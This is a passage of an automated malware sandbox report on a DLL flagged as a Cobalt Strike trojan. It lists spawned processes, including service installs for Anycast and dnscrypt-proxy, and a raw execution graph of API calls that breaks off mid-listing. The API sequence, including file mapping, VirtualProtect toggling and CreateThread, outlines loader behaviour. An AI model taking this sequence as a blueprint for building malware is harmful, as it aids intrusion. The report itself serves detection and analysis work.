                                                                                                                            Commandline:rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_string_multimap_append
                                                                                                                            Imagebase:0x7ff745de0000
                                                                                                                            File size:71'680 bytes
                                                                                                                            MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:30
                                                                                                                            Start time:16:32:09
                                                                                                                            Start date:12/03/2024
                                                                                                                            Path:C:\Windows\System32\rundll32.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_string_multimap_alloc
                                                                                                                            Imagebase:0x7ff745de0000
                                                                                                                            File size:71'680 bytes
                                                                                                                            MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:31
                                                                                                                            Start time:16:32:09
                                                                                                                            Start date:12/03/2024
                                                                                                                            Path:C:\Windows\System32\rundll32.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_string_map_value
                                                                                                                            Imagebase:0x7ff745de0000
                                                                                                                            File size:71'680 bytes
                                                                                                                            MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:32
                                                                                                                            Start time:16:32:13
                                                                                                                            Start date:12/03/2024
                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Program Files (x86)\Anycast\install.cmd"
                                                                                                                            Imagebase:0x790000
                                                                                                                            File size:236'544 bytes
                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:33
                                                                                                                            Start time:16:32:13
                                                                                                                            Start date:12/03/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:34
                                                                                                                            Start time:16:32:13
                                                                                                                            Start date:12/03/2024
                                                                                                                            Path:C:\Program Files (x86)\Anycast\anycast-service.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:anycast-service.exe stop
                                                                                                                            Imagebase:0x7ff6abac0000
                                                                                                                            File size:5'261'392 bytes
                                                                                                                            MD5 hash:6575F6D7E539BC890ACC7587AA0D2507
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Antivirus matches:
                                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:36
                                                                                                                            Start time:16:32:14
                                                                                                                            Start date:12/03/2024
                                                                                                                            Path:C:\Program Files (x86)\Anycast\anycast-service.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:anycast-service.exe uninstall
                                                                                                                            Imagebase:0x7ff6abac0000
                                                                                                                            File size:5'261'392 bytes
                                                                                                                            MD5 hash:6575F6D7E539BC890ACC7587AA0D2507
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:37
                                                                                                                            Start time:16:32:14
                                                                                                                            Start date:12/03/2024
                                                                                                                            Path:C:\Program Files (x86)\Anycast\anycast-service.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:anycast-service.exe install
                                                                                                                            Imagebase:0x7ff6abac0000
                                                                                                                            File size:5'261'392 bytes
                                                                                                                            MD5 hash:6575F6D7E539BC890ACC7587AA0D2507
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:38
                                                                                                                            Start time:16:32:15
                                                                                                                            Start date:12/03/2024
                                                                                                                            Path:C:\Program Files (x86)\Anycast\anycast-service.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Program Files (x86)\Anycast\anycast-service.exe
                                                                                                                            Imagebase:0x7ff6abac0000
                                                                                                                            File size:5'261'392 bytes
                                                                                                                            MD5 hash:6575F6D7E539BC890ACC7587AA0D2507
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:39
                                                                                                                            Start time:16:32:16
                                                                                                                            Start date:12/03/2024
                                                                                                                            Path:C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:dnscrypt\dnscrypt-proxy.exe -service install
                                                                                                                            Imagebase:0x960000
                                                                                                                            File size:8'445'440 bytes
                                                                                                                            MD5 hash:9A040B1497076197702308784DE209A5
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Antivirus matches:
                                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:40
                                                                                                                            Start time:16:32:16
                                                                                                                            Start date:12/03/2024
                                                                                                                            Path:C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:dnscrypt\dnscrypt-proxy.exe -service start
                                                                                                                            Imagebase:0x960000
                                                                                                                            File size:8'445'440 bytes
                                                                                                                            MD5 hash:9A040B1497076197702308784DE209A5
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:41
                                                                                                                            Start time:16:32:17
                                                                                                                            Start date:12/03/2024
                                                                                                                            Path:C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe" -config dnscrypt-proxy.toml
                                                                                                                            Imagebase:0x960000
                                                                                                                            File size:8'445'440 bytes
                                                                                                                            MD5 hash:9A040B1497076197702308784DE209A5
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:false

                                                                                                                            General

                                                                                                                            Target ID:43
                                                                                                                            Start time:16:32:24
                                                                                                                            Start date:12/03/2024
                                                                                                                            Path:C:\Program Files (x86)\Anycast\Anycast.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:C:\Program Files (x86)\Anycast\Anycast.exe
                                                                                                                            Imagebase:0xf30000
                                                                                                                            File size:1'483'856 bytes
                                                                                                                            MD5 hash:DF90ED2B8D1C23A3AD6A8338BFE4A9C6
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Antivirus matches:
                                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                                            Has exited:false

                                                                                                                            General

                                                                                                                            Target ID:44
                                                                                                                            Start time:16:32:29
                                                                                                                            Start date:12/03/2024
                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Program Files (x86)\Anycast\install.cmd"
                                                                                                                            Imagebase:0x790000
                                                                                                                            File size:236'544 bytes
                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:45
                                                                                                                            Start time:16:32:29
                                                                                                                            Start date:12/03/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            Disassembly

                                                                                                                            Reset < >

                                                                                                                              Execution Graph

                                                                                                                              Execution Coverage:1.4%
                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                              Signature Coverage:5.1%
                                                                                                                              Total number of Nodes:1598
                                                                                                                              Total number of Limit Nodes:9
                                                                                                                              execution_graph 7455 7ff8b8061d8f 7458 7ff8b8056f3c 7455->7458 7463 7ff8b8056eb4 7458->7463 7460 7ff8b8056f5c 7462 7ff8b8054620 _CallSETranslator 58 API calls 7462->7460 7464 7ff8b8056f24 7463->7464 7465 7ff8b8056ed3 7463->7465 7464->7460 7464->7462 7465->7464 7466 7ff8b8054620 _CallSETranslator 58 API calls 7465->7466 7466->7464 7332 7ff8b8061d09 7341 7ff8b8053aac 7332->7341 7334 7ff8b8061d5b __CxxCallCatchBlock 7355 7ff8b8054620 7334->7355 7338 7ff8b8054620 _CallSETranslator 58 API calls 7339 7ff8b8061d7f 7338->7339 7342 7ff8b8054620 _CallSETranslator 58 API calls 7341->7342 7343 7ff8b8053abe 7342->7343 7344 7ff8b8053af9 7343->7344 7345 7ff8b8054620 _CallSETranslator 58 API calls 7343->7345 7346 7ff8b8059784 BuildCatchObjectHelperInternal 47 API calls 7344->7346 7347 7ff8b8053ac9 7345->7347 7348 7ff8b8053afe 7346->7348 7347->7344 7349 7ff8b8053ae5 7347->7349 7350 7ff8b8054620 _CallSETranslator 58 API calls 7349->7350 7351 7ff8b8053aea 7350->7351 7351->7334 7352 7ff8b8053d14 7351->7352 7353 7ff8b8054620 _CallSETranslator 58 API calls 7352->7353 7354 7ff8b8053d22 7353->7354 7354->7334 7361 7ff8b805463c 7355->7361 7358 7ff8b805462e 7358->7338 7359 7ff8b8059784 BuildCatchObjectHelperInternal 47 API calls 7360 7ff8b8054638 7359->7360 7362 7ff8b805465b GetLastError 7361->7362 7363 7ff8b8054629 7361->7363 7375 7ff8b8057b2c 7362->7375 7363->7358 7363->7359 7376 7ff8b805794c __vcrt_InitializeCriticalSectionEx 5 API calls 7375->7376 7377 7ff8b8057b53 TlsGetValue 7376->7377 7467 7ff8b8054188 7474 7ff8b80578cc 7467->7474 7470 7ff8b8054195 7475 7ff8b80578d4 7474->7475 7477 7ff8b8057905 7475->7477 7478 7ff8b8054191 7475->7478 7487 7ff8b8057bc8 7475->7487 7479 7ff8b8057914 __vcrt_uninitialize_locks DeleteCriticalSection 7477->7479 7478->7470 7480 7ff8b80546fc 7478->7480 7479->7478 7492 7ff8b8057a9c 7480->7492 7488 7ff8b805794c __vcrt_InitializeCriticalSectionEx 5 API calls 7487->7488 7489 7ff8b8057bfe 7488->7489 7490 7ff8b8057c08 7489->7490 7491 7ff8b8057c13 InitializeCriticalSectionAndSpinCount 7489->7491 7490->7475 7491->7490 7493 7ff8b805794c __vcrt_InitializeCriticalSectionEx 5 API calls 7492->7493 7494 7ff8b8057ac1 TlsAlloc 7493->7494 8663 7ff8b8057088 8672 7ff8b8056fbb __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 8663->8672 8664 7ff8b80570af 8665 7ff8b8054620 _CallSETranslator 58 API calls 8664->8665 8666 7ff8b80570b4 8665->8666 8670 7ff8b80570bf 8666->8670 8671 7ff8b8054620 _CallSETranslator 58 API calls 8666->8671 8667 7ff8b80570ea 8668 7ff8b8059784 BuildCatchObjectHelperInternal 47 API calls 8667->8668 8668->8670 8669 7ff8b80570cc __FrameHandler3::GetHandlerSearchState 8670->8669 8673 7ff8b8059784 BuildCatchObjectHelperInternal 47 API calls 8670->8673 8671->8670 8672->8664 8672->8667 8675 7ff8b8053b00 58 API calls BuildCatchObjectHelperInternal 8672->8675 8676 7ff8b8053b28 __FrameHandler3::FrameUnwindToEmptyState 58 API calls 8672->8676 8674 7ff8b80570f5 8673->8674 8675->8672 8676->8672 7209 7ff8b8052a94 7217 7ff8b8052e28 7209->7217 7212 7ff8b8052ac3 7219 7ff8b80596d8 7212->7219 7215 7ff8b8052abf 7218 7ff8b8052ab6 __scrt_dllmain_crt_thread_attach 7217->7218 7218->7212 7218->7215 7220 7ff8b805c7c4 7219->7220 7221 7ff8b8052ac8 7220->7221 7229 7ff8b805c748 7220->7229 7221->7215 7223 7ff8b80541d4 7221->7223 7224 7ff8b80541dc 7223->7224 7225 7ff8b80541e6 7223->7225 7241 7ff8b8054744 7224->7241 7225->7215 7240 7ff8b805a1fc EnterCriticalSection 7229->7240 7231 7ff8b805c758 7232 7ff8b805ec0c 53 API calls 7231->7232 7233 7ff8b805c761 7232->7233 7234 7ff8b805c550 55 API calls 7233->7234 7239 7ff8b805c76f 7233->7239 7236 7ff8b805c76a 7234->7236 7235 7ff8b805a250 BuildCatchObjectHelperInternal LeaveCriticalSection 7237 7ff8b805c77b 7235->7237 7238 7ff8b805c640 GetStdHandle GetFileType 7236->7238 7237->7220 7238->7239 7239->7235 7242 7ff8b80541e1 7241->7242 7243 7ff8b8054753 7241->7243 7245 7ff8b8057914 7242->7245 7249 7ff8b8057ae4 7243->7249 7246 7ff8b805793f 7245->7246 7247 7ff8b8057922 DeleteCriticalSection 7246->7247 7248 7ff8b8057943 7246->7248 7247->7246 7248->7225 7253 7ff8b805794c 7249->7253 7254 7ff8b8057a66 TlsFree 7253->7254 7259 7ff8b8057990 __vcrt_InitializeCriticalSectionEx 7253->7259 7255 7ff8b80579be LoadLibraryExW 7257 7ff8b80579df GetLastError 7255->7257 7258 7ff8b8057a35 7255->7258 7256 7ff8b8057a55 GetProcAddress 7256->7254 7257->7259 7258->7256 7260 7ff8b8057a4c FreeLibrary 7258->7260 7259->7254 7259->7255 7259->7256 7261 7ff8b8057a01 LoadLibraryExW 7259->7261 7260->7256 7261->7258 7261->7259 7262 7ff8b8059194 7263 7ff8b80591ad 7262->7263 7264 7ff8b80591a9 7262->7264 7265 7ff8b805b988 67 API calls 7263->7265 7266 7ff8b80591b2 7265->7266 7277 7ff8b805bee4 GetEnvironmentStringsW 7266->7277 7269 7ff8b80591bf 7271 7ff8b805a26c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 7269->7271 7270 7ff8b80591cb 7298 7ff8b8059208 7270->7298 7271->7264 7274 7ff8b805a26c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 7275 7ff8b80591f2 7274->7275 7276 7ff8b805a26c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 7275->7276 7276->7264 7278 7ff8b80591b7 7277->7278 7279 7ff8b805bf14 7277->7279 7278->7269 7278->7270 7280 7ff8b805be04 WideCharToMultiByte 7279->7280 7281 7ff8b805bf65 7280->7281 7282 7ff8b805bf6c FreeEnvironmentStringsW 7281->7282 7283 7ff8b805bf77 7281->7283 7282->7278 7284 7ff8b805a154 12 API calls 7283->7284 7285 7ff8b805bf7f 7284->7285 7286 7ff8b805bf87 7285->7286 7287 7ff8b805bf90 7285->7287 7288 7ff8b805a26c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 7286->7288 7289 7ff8b805be04 WideCharToMultiByte 7287->7289 7290 7ff8b805bf8e 7288->7290 7291 7ff8b805bfb3 7289->7291 7290->7282 7292 7ff8b805bfb7 7291->7292 7293 7ff8b805bfc1 7291->7293 7294 7ff8b805a26c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 7292->7294 7295 7ff8b805a26c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 7293->7295 7296 7ff8b805bfbf FreeEnvironmentStringsW 7294->7296 7295->7296 7296->7278 7299 7ff8b805922d 7298->7299 7300 7ff8b805a400 BuildCatchObjectHelperInternal 11 API calls 7299->7300 7311 7ff8b8059263 7300->7311 7301 7ff8b805926b 7302 7ff8b805a26c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 7301->7302 7303 7ff8b80591d3 7302->7303 7303->7274 7304 7ff8b80592de 7305 7ff8b805a26c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 7304->7305 7305->7303 7306 7ff8b805a400 BuildCatchObjectHelperInternal 11 API calls 7306->7311 7307 7ff8b80592cd 7326 7ff8b8059318 7307->7326 7311->7301 7311->7304 7311->7306 7311->7307 7312 7ff8b8059303 7311->7312 7315 7ff8b805a26c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 7311->7315 7317 7ff8b80597dc 7311->7317 7314 7ff8b805881c _invalid_parameter_noinfo_noreturn 17 API calls 7312->7314 7313 7ff8b805a26c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 7313->7301 7316 7ff8b8059316 7314->7316 7315->7311 7318 7ff8b80597e9 7317->7318 7319 7ff8b80597f3 7317->7319 7318->7319 7323 7ff8b805980e 7318->7323 7320 7ff8b805a3e0 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 7319->7320 7325 7ff8b80597fa 7320->7325 7321 7ff8b80587cc _invalid_parameter_noinfo 47 API calls 7322 7ff8b8059806 7321->7322 7322->7311 7323->7322 7324 7ff8b805a3e0 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 7323->7324 7324->7325 7325->7321 7328 7ff8b805931d 7326->7328 7331 7ff8b80592d5 7326->7331 7327 7ff8b8059346 7330 7ff8b805a26c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 7327->7330 7328->7327 7329 7ff8b805a26c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 7328->7329 7329->7328 7330->7331 7331->7313 7496 7ff8b805a794 7497 7ff8b805a7b9 7496->7497 7498 7ff8b805a7d0 7496->7498 7499 7ff8b805a3e0 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 7497->7499 7506 7ff8b805a888 7498->7506 7510 7ff8b805a81d 7498->7510 7512 7ff8b805a860 7498->7512 7528 7ff8b805a9d8 7498->7528 7500 7ff8b805a7be 7499->7500 7501 7ff8b80587cc _invalid_parameter_noinfo 47 API calls 7500->7501 7504 7ff8b805a7c9 7501->7504 7502 7ff8b8058fac 11 API calls 7503 7ff8b805a8e0 7502->7503 7507 7ff8b805a8e8 7503->7507 7515 7ff8b805a91a 7503->7515 7506->7502 7509 7ff8b805a26c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 7507->7509 7508 7ff8b805a979 7513 7ff8b805a26c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 7508->7513 7511 7ff8b805a8ef 7509->7511 7514 7ff8b805a840 7510->7514 7518 7ff8b805a26c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 7510->7518 7511->7514 7519 7ff8b805a26c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 7511->7519 7512->7514 7520 7ff8b805a26c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 7512->7520 7516 7ff8b805a984 7513->7516 7517 7ff8b805a26c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 7514->7517 7515->7508 7515->7515 7525 7ff8b805a9bf 7515->7525 7550 7ff8b805dfe0 7515->7550 7521 7ff8b805a99d 7516->7521 7524 7ff8b805a26c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 7516->7524 7517->7504 7518->7510 7519->7511 7520->7512 7522 7ff8b805a26c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 7521->7522 7522->7504 7524->7516 7526 7ff8b805881c _invalid_parameter_noinfo_noreturn 17 API calls 7525->7526 7527 7ff8b805a9d4 7526->7527 7529 7ff8b805aa06 7528->7529 7529->7529 7530 7ff8b805a400 BuildCatchObjectHelperInternal 11 API calls 7529->7530 7531 7ff8b805aa51 7530->7531 7532 7ff8b805dfe0 47 API calls 7531->7532 7533 7ff8b805aa87 7532->7533 7534 7ff8b805881c _invalid_parameter_noinfo_noreturn 17 API calls 7533->7534 7535 7ff8b805ab5b 7534->7535 7536 7ff8b805aeac 47 API calls 7535->7536 7537 7ff8b805ac3e 7536->7537 7538 7ff8b805c2a0 5 API calls 7537->7538 7539 7ff8b805ac69 7538->7539 7559 7ff8b805a48c 7539->7559 7542 7ff8b805ad05 7543 7ff8b805aeac 47 API calls 7542->7543 7544 7ff8b805ad35 7543->7544 7545 7ff8b805c2a0 5 API calls 7544->7545 7546 7ff8b805ad5e 7545->7546 7581 7ff8b805a608 7546->7581 7549 7ff8b805a9d8 57 API calls 7555 7ff8b805dffd 7550->7555 7551 7ff8b805e002 7552 7ff8b805e018 7551->7552 7553 7ff8b805a3e0 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 7551->7553 7552->7515 7554 7ff8b805e00c 7553->7554 7556 7ff8b80587cc _invalid_parameter_noinfo 47 API calls 7554->7556 7555->7551 7555->7552 7557 7ff8b805e04c 7555->7557 7556->7552 7557->7552 7558 7ff8b805a3e0 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 7557->7558 7558->7554 7560 7ff8b805a4da 7559->7560 7561 7ff8b805a4b6 7559->7561 7562 7ff8b805a534 7560->7562 7567 7ff8b805a4df 7560->7567 7564 7ff8b805a26c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 7561->7564 7565 7ff8b805a4c5 FindFirstFileExW 7561->7565 7563 7ff8b805bd74 MultiByteToWideChar 7562->7563 7569 7ff8b805a550 7563->7569 7564->7565 7565->7542 7566 7ff8b805a4f4 7568 7ff8b805a154 12 API calls 7566->7568 7567->7565 7567->7566 7571 7ff8b805a26c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 7567->7571 7568->7565 7570 7ff8b805a557 GetLastError 7569->7570 7573 7ff8b805a592 7569->7573 7576 7ff8b805a585 7569->7576 7580 7ff8b805a26c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 7569->7580 7572 7ff8b805a354 11 API calls 7570->7572 7571->7566 7575 7ff8b805a564 7572->7575 7573->7565 7574 7ff8b805bd74 MultiByteToWideChar 7573->7574 7578 7ff8b805a5d6 7574->7578 7579 7ff8b805a3e0 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 7575->7579 7577 7ff8b805a154 12 API calls 7576->7577 7577->7573 7578->7565 7578->7570 7579->7565 7580->7576 7582 7ff8b805a656 7581->7582 7583 7ff8b805a632 7581->7583 7585 7ff8b805a65c 7582->7585 7586 7ff8b805a6b0 7582->7586 7584 7ff8b805a641 7583->7584 7588 7ff8b805a26c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 7583->7588 7584->7549 7585->7584 7589 7ff8b805a26c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 7585->7589 7593 7ff8b805a671 7585->7593 7587 7ff8b805be04 WideCharToMultiByte 7586->7587 7592 7ff8b805a6d4 7587->7592 7588->7584 7589->7593 7590 7ff8b805a154 12 API calls 7590->7584 7591 7ff8b805a6db GetLastError 7594 7ff8b805a354 11 API calls 7591->7594 7592->7591 7595 7ff8b805a718 7592->7595 7596 7ff8b805a70c 7592->7596 7599 7ff8b805a26c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 7592->7599 7593->7590 7598 7ff8b805a6e8 7594->7598 7595->7584 7597 7ff8b805be04 WideCharToMultiByte 7595->7597 7600 7ff8b805a154 12 API calls 7596->7600 7601 7ff8b805a764 7597->7601 7602 7ff8b805a3e0 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 7598->7602 7599->7596 7600->7595 7601->7584 7601->7591 7602->7584 7603 7ff8b8051990 7612 7ff8b80511d0 7603->7612 7606 7ff8b80511d0 66 API calls 7607 7ff8b80519ae 7606->7607 7608 7ff8b80511d0 66 API calls 7607->7608 7609 7ff8b80519ba LoadLibraryA CreateThread 7608->7609 7635 7ff8b80515e0 7609->7635 7646 7ff8b80521d4 7612->7646 7615 7ff8b805126f BuildCatchObjectHelperInternal 7617 7ff8b80512a3 GetModuleHandleA K32GetModuleInformation CreateFileA CreateFileMappingW MapViewOfFile 7615->7617 7618 7ff8b8051411 UnmapViewOfFile CloseHandle CloseHandle 7617->7618 7623 7ff8b805136d BuildCatchObjectHelperInternal 7617->7623 7619 7ff8b8051464 7618->7619 7620 7ff8b805143b 7618->7620 7621 7ff8b8052180 _log10_special 8 API calls 7619->7621 7620->7619 7624 7ff8b805149c 7620->7624 7622 7ff8b805147b 7621->7622 7622->7606 7626 7ff8b80513b5 VirtualProtect 7623->7626 7627 7ff8b805140c 7623->7627 7630 7ff8b80513e6 VirtualProtect 7623->7630 7669 7ff8b80587ec 7624->7669 7626->7623 7627->7618 7630->7623 7636 7ff8b8051612 7635->7636 7636->7636 7637 7ff8b805185d K32GetModuleInformation 7636->7637 7638 7ff8b805195a Sleep 7637->7638 7640 7ff8b80518a5 BuildCatchObjectHelperInternal 7637->7640 7639 7ff8b8051968 7638->7639 7641 7ff8b8052180 _log10_special 8 API calls 7639->7641 7642 7ff8b80518f5 VirtualProtect 7640->7642 7643 7ff8b8051952 7640->7643 7645 7ff8b805192a VirtualProtect 7640->7645 7644 7ff8b8051977 7641->7644 7642->7640 7643->7638 7645->7640 7649 7ff8b80521df 7646->7649 7647 7ff8b8051224 7647->7615 7655 7ff8b8051ed0 7647->7655 7648 7ff8b8058874 BuildCatchObjectHelperInternal 2 API calls 7648->7649 7649->7647 7649->7648 7650 7ff8b80521fe 7649->7650 7651 7ff8b8052209 7650->7651 7674 7ff8b8052814 7650->7674 7678 7ff8b8051100 7651->7678 7656 7ff8b8051efe 7655->7656 7657 7ff8b8052056 7655->7657 7658 7ff8b8051f51 7656->7658 7661 7ff8b8051f8a 7656->7661 7689 7ff8b80511a0 7657->7689 7662 7ff8b80521d4 51 API calls 7658->7662 7663 7ff8b8052050 7658->7663 7665 7ff8b80521d4 51 API calls 7661->7665 7667 7ff8b8051f73 BuildCatchObjectHelperInternal 7661->7667 7662->7667 7664 7ff8b8051100 Concurrency::cancel_current_task 51 API calls 7663->7664 7664->7657 7665->7667 7666 7ff8b80587ec _invalid_parameter_noinfo_noreturn 47 API calls 7666->7663 7667->7666 7668 7ff8b8051ffe BuildCatchObjectHelperInternal 7667->7668 7668->7617 7670 7ff8b8058664 _invalid_parameter_noinfo 47 API calls 7669->7670 7671 7ff8b8058805 7670->7671 7672 7ff8b805881c _invalid_parameter_noinfo_noreturn 17 API calls 7671->7672 7673 7ff8b805881a 7672->7673 7675 7ff8b8052822 std::bad_alloc::bad_alloc 7674->7675 7684 7ff8b8053e94 7675->7684 7677 7ff8b8052833 7679 7ff8b805110e Concurrency::cancel_current_task 7678->7679 7680 7ff8b8053e94 Concurrency::cancel_current_task 2 API calls 7679->7680 7681 7ff8b805111f 7680->7681 7682 7ff8b8053ddc __std_exception_copy 49 API calls 7681->7682 7683 7ff8b8051149 7682->7683 7685 7ff8b8053eb3 7684->7685 7686 7ff8b8053edc RtlPcToFileHeader 7685->7686 7687 7ff8b8053efe RaiseException 7685->7687 7688 7ff8b8053ef4 7686->7688 7687->7677 7688->7687 7692 7ff8b8052140 7689->7692 7697 7ff8b80520bc 7692->7697 7695 7ff8b8053e94 Concurrency::cancel_current_task 2 API calls 7696 7ff8b8052162 7695->7696 7698 7ff8b8053ddc __std_exception_copy 49 API calls 7697->7698 7699 7ff8b80520f0 7698->7699 7699->7695 8680 7ff8b8061a90 __scrt_dllmain_exception_filter 8681 7ff8b805967c 8682 7ff8b805a26c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8681->8682 8683 7ff8b805968c 8682->8683 8684 7ff8b805a26c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8683->8684 8685 7ff8b80596a0 8684->8685 8686 7ff8b805a26c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8685->8686 8687 7ff8b80596b4 8686->8687 8688 7ff8b805a26c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8687->8688 8689 7ff8b80596c8 8688->8689 8690 7ff8b805e47c 8691 7ff8b805e487 8690->8691 8692 7ff8b805e555 8691->8692 8694 7ff8b805e56e 8691->8694 8693 7ff8b805a3e0 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8692->8693 8695 7ff8b805e55a 8693->8695 8697 7ff8b805aeac 47 API calls 8694->8697 8698 7ff8b805e565 8694->8698 8696 7ff8b80587cc _invalid_parameter_noinfo 47 API calls 8695->8696 8696->8698 8697->8698 7379 7ff8b8052104 7382 